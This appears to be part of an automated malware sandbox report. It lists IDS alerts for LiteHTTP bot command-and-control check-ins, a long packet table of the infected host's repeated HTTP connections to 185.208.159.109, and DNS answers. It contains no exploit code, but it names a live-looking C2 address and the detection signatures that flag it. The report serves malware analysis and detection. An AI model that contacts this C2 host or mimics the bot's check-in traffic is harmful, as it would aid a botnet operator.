                                        2024-12-17T10:22:37.331293+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.549989185.208.159.10980TCP
                                        2024-12-17T10:22:37.331293+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.549989185.208.159.10980TCP
                                        2024-12-17T10:22:46.487687+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.549990185.208.159.10980TCP
                                        2024-12-17T10:22:47.518810+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.549990185.208.159.10980TCP
                                        2024-12-17T10:22:47.518810+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.549990185.208.159.10980TCP
                                        2024-12-17T10:22:55.472046+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.549991185.208.159.10980TCP
                                        2024-12-17T10:22:56.440691+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.549991185.208.159.10980TCP
                                        2024-12-17T10:22:56.440691+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.549991185.208.159.10980TCP
                                        2024-12-17T10:23:13.456404+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.549992185.208.159.10980TCP
                                        2024-12-17T10:23:14.518821+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.549992185.208.159.10980TCP
                                        2024-12-17T10:23:14.518821+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.549992185.208.159.10980TCP
                                        2024-12-17T10:23:21.034585+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.549993185.208.159.10980TCP
                                        2024-12-17T10:23:21.638539+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.549993185.208.159.10980TCP
                                        2024-12-17T10:23:21.638539+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.549993185.208.159.10980TCP
                                        2024-12-17T10:23:23.706595+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.549995185.208.159.10980TCP
                                        2024-12-17T10:23:24.690730+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.549995185.208.159.10980TCP
                                        2024-12-17T10:23:24.690730+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.549995185.208.159.10980TCP
                                        2024-12-17T10:23:31.987653+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.549996185.208.159.10980TCP
                                        2024-12-17T10:23:32.971952+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.549996185.208.159.10980TCP
                                        2024-12-17T10:23:32.971952+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.549996185.208.159.10980TCP

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Dec 17, 2024 10:20:17.657490015 CET4982680192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:20:17.777642012 CET8049826185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:20:17.777735949 CET4982680192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:20:17.778166056 CET4982680192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:20:17.897882938 CET8049826185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:20:18.128650904 CET4982680192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:20:18.248436928 CET8049826185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:20:19.057401896 CET8049826185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:20:19.143774033 CET4982680192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:20:19.292892933 CET8049826185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:20:19.440527916 CET4982680192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:20:24.214019060 CET8049826185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:20:24.214092970 CET4982680192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:20:35.456891060 CET4982680192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:20:35.457371950 CET4986780192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:20:35.576656103 CET8049826185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:20:35.577073097 CET8049867185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:20:35.577228069 CET4986780192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:20:35.577512026 CET4986780192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:20:35.697195053 CET8049867185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:20:35.925260067 CET4986780192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:20:36.045145988 CET8049867185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:20:36.861203909 CET8049867185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:20:36.924932957 CET4986780192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:20:37.096514940 CET8049867185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:20:37.098866940 CET4986780192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:20:37.219122887 CET8049867185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:20:37.219233036 CET4986780192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:20:55.003887892 CET4990880192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:20:55.123816967 CET8049908185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:20:55.126806974 CET4990880192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:20:55.126995087 CET4990880192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:20:55.246768951 CET8049908185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:20:55.472043037 CET4990880192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:20:55.591914892 CET8049908185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:20:56.405700922 CET8049908185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:20:56.558753014 CET4990880192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:20:56.644464970 CET8049908185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:20:56.721829891 CET4990880192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:01.414638042 CET8049908185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:01.414756060 CET4990880192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:12.175652027 CET4990880192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:12.176493883 CET4994880192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:12.295351982 CET8049908185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:12.296261072 CET8049948185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:12.296343088 CET4994880192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:12.296504021 CET4994880192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:12.416227102 CET8049948185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:12.644069910 CET4994880192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:12.763952971 CET8049948185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:13.574693918 CET8049948185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:13.643978119 CET4994880192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:13.808129072 CET8049948185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:13.940582991 CET4994880192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:18.681658983 CET8049948185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:18.681716919 CET4994880192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:28.233853102 CET4997980192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:28.353801966 CET8049979185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:28.354392052 CET4997980192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:28.354572058 CET4997980192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:28.474801064 CET8049979185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:28.706501961 CET4997980192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:28.827615976 CET8049979185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:29.632493019 CET8049979185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:29.722238064 CET4997980192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:29.868261099 CET8049979185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:29.925050974 CET4997980192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:31.082242012 CET4994880192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:31.082278013 CET4998080192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:31.202034950 CET8049948185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:31.202058077 CET8049980185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:31.202275991 CET4998080192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:31.202579975 CET4998080192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:31.322396040 CET8049980185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:31.550246000 CET4998080192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:31.670001030 CET8049980185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:32.484730959 CET8049980185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:32.560184002 CET4998080192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:32.720211029 CET8049980185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:32.815642118 CET4998080192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:34.641391039 CET8049979185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:34.641457081 CET4997980192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:36.614619970 CET4997980192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:36.615588903 CET4998180192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:36.735023975 CET8049979185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:36.735264063 CET8049981185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:36.735342979 CET4998180192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:36.853759050 CET4998180192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:36.975187063 CET8049981185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:37.207747936 CET4998180192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:37.327827930 CET8049981185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:37.490550041 CET8049980185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:37.490757942 CET4998080192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:38.012603998 CET8049981185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:38.143750906 CET4998180192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:38.252089024 CET8049981185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:38.331340075 CET4998180192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:43.022794962 CET8049981185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:43.022898912 CET4998180192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:43.269701958 CET4998080192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:43.269915104 CET4998280192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:43.389585972 CET8049980185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:43.389679909 CET8049982185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:43.390265942 CET4998280192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:43.390369892 CET4998280192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:43.510186911 CET8049982185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:43.738125086 CET4998280192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:43.857992887 CET8049982185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:44.676506996 CET8049982185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:44.722069025 CET4998280192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:44.912226915 CET8049982185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:45.112581968 CET4998280192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:49.684474945 CET8049982185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:49.684583902 CET4998280192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:53.888602972 CET4998180192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:53.889162064 CET4998380192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:54.008476973 CET8049981185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:54.009052038 CET8049983185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:54.009200096 CET4998380192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:54.015923977 CET4998380192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:54.135957003 CET8049983185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:54.362643003 CET4998380192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:54.482361078 CET8049983185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:55.292049885 CET8049983185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:55.440620899 CET4998380192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:55.524868965 CET8049983185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:55.566147089 CET4998280192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:55.566530943 CET4998480192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:55.643742085 CET4998380192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:55.685939074 CET8049982185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:55.686201096 CET8049984185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:55.686290026 CET4998480192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:55.686429977 CET4998480192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:55.806108952 CET8049984185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:56.034478903 CET4998480192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:56.154297113 CET8049984185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:56.966278076 CET8049984185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:57.144479036 CET4998480192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:21:57.204272032 CET8049984185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:21:57.331249952 CET4998480192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:00.300543070 CET8049983185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:00.300715923 CET4998380192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:01.973728895 CET8049984185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:01.973805904 CET4998480192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:11.191423893 CET4998480192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:11.192014933 CET4998580192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:11.311207056 CET8049984185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:11.311712980 CET8049985185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:11.311894894 CET4998580192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:11.312266111 CET4998580192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:11.431996107 CET8049985185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:11.660044909 CET4998580192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:11.779931068 CET8049985185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:12.590095997 CET8049985185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:12.722385883 CET4998580192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:12.824393988 CET8049985185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:12.926055908 CET4998580192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:13.754156113 CET4998380192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:13.754156113 CET4998680192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:13.874041080 CET8049983185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:13.874058962 CET8049986185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:13.874198914 CET4998680192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:13.875257969 CET4998680192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:13.994940042 CET8049986185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:14.222560883 CET4998680192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:14.342966080 CET8049986185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:15.152443886 CET8049986185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:15.331500053 CET4998680192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:15.389276028 CET8049986185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:15.440642118 CET4998680192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:17.598901987 CET8049985185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:17.599030018 CET4998580192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:20.161262035 CET8049986185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:20.161468029 CET4998680192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:29.129726887 CET4998780192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:29.129734039 CET4998680192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:29.249558926 CET8049986185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:29.249602079 CET8049987185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:29.250087976 CET4998780192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:29.250087976 CET4998780192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:29.369831085 CET8049987185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:29.597039938 CET4998780192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:29.785959959 CET8049987185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:29.988481045 CET4998580192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:29.988909006 CET4998880192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:30.108258963 CET8049985185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:30.108683109 CET8049988185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:30.108869076 CET4998880192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:30.108968019 CET4998880192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:30.228631020 CET8049988185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:30.456639051 CET4998880192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:30.530515909 CET8049987185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:30.577871084 CET8049988185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:30.612545967 CET4998780192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:30.764267921 CET8049987185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:30.925069094 CET4998780192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:31.387343884 CET8049988185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:31.612580061 CET4998880192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:31.620615005 CET8049988185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:31.721963882 CET4998880192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:35.540946960 CET8049987185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:35.542074919 CET4998780192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:35.868340969 CET4998780192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:35.868696928 CET4998980192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:35.988785982 CET8049987185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:35.988806963 CET8049989185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:35.988897085 CET4998980192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:35.989118099 CET4998980192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:36.108777046 CET8049989185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:36.347067118 CET4998980192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:36.396080971 CET8049988185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:36.396568060 CET4998880192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:36.467089891 CET8049989185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:37.269721031 CET8049989185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:37.331293106 CET4998980192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:37.504338980 CET8049989185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:37.643898964 CET4998980192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:42.277895927 CET8049989185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:42.278065920 CET4998980192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:46.014787912 CET4998880192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:46.015959024 CET4999080192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:46.134814024 CET8049988185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:46.135683060 CET8049990185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:46.135871887 CET4999080192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:46.135905981 CET4999080192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:46.255682945 CET8049990185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:46.487687111 CET4999080192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:46.607511044 CET8049990185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:47.413961887 CET8049990185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:47.518810034 CET4999080192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:47.648416042 CET8049990185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:47.721990108 CET4999080192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:52.423094988 CET8049990185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:52.423284054 CET4999080192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:54.999517918 CET4998980192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:55.000072956 CET4999180192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:55.119362116 CET8049989185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:55.119924068 CET8049991185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:55.119995117 CET4999180192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:55.120124102 CET4999180192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:55.240777969 CET8049991185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:55.472045898 CET4999180192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:55.591912031 CET8049991185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:56.399256945 CET8049991185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:56.440690994 CET4999180192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:22:56.632327080 CET8049991185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:22:56.831357002 CET4999180192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:01.407948971 CET8049991185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:01.408158064 CET4999180192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:12.978766918 CET4999080192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:12.979238987 CET4999280192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:13.098814964 CET8049990185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:13.099111080 CET8049992185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:13.101869106 CET4999280192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:13.101975918 CET4999280192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:13.221827030 CET8049992185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:13.456403971 CET4999280192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:13.576322079 CET8049992185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:14.379671097 CET8049992185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:14.518821001 CET4999280192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:14.616410971 CET8049992185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:14.721966982 CET4999280192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:19.273072958 CET4999180192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:19.274441957 CET4999380192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:19.386686087 CET8049992185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:19.386785984 CET4999280192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:19.393325090 CET8049991185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:19.394315958 CET8049993185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:19.394386053 CET4999380192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:20.681636095 CET4999380192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:20.801515102 CET8049993185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:21.034584999 CET4999380192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:21.092236042 CET8049993185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:21.144026041 CET4999380192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:21.154747963 CET8049993185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:21.449776888 CET8049993185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:21.638539076 CET4999380192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:23.230217934 CET4999580192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:23.352770090 CET8049995185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:23.352897882 CET4999580192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:23.353261948 CET4999580192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:23.473125935 CET8049995185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:23.706594944 CET4999580192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:23.826451063 CET8049995185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:24.637139082 CET8049995185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:24.690730095 CET4999580192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:24.868328094 CET8049995185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:24.909487963 CET4999580192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:26.453879118 CET8049993185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:26.453952074 CET4999380192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:29.644222975 CET8049995185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:29.644296885 CET4999580192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:31.519593000 CET4999280192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:31.519648075 CET4999680192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:31.639497042 CET8049992185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:31.639527082 CET8049996185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:31.639671087 CET4999680192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:31.639780045 CET4999680192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:31.759484053 CET8049996185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:31.987653017 CET4999680192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:32.107350111 CET8049996185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:32.917309046 CET8049996185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:32.971951962 CET4999680192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:33.153312922 CET8049996185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:33.206336021 CET4999680192.168.2.5185.208.159.109
                                        Dec 17, 2024 10:23:38.025374889 CET8049996185.208.159.109192.168.2.5
                                        Dec 17, 2024 10:23:38.025440931 CET4999680192.168.2.5185.208.159.109

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Dec 17, 2024 10:23:20.034152985 CET1.1.1.1192.168.2.50x3714No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                        Dec 17, 2024 10:23:20.034152985 CET1.1.1.1192.168.2.50x3714No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

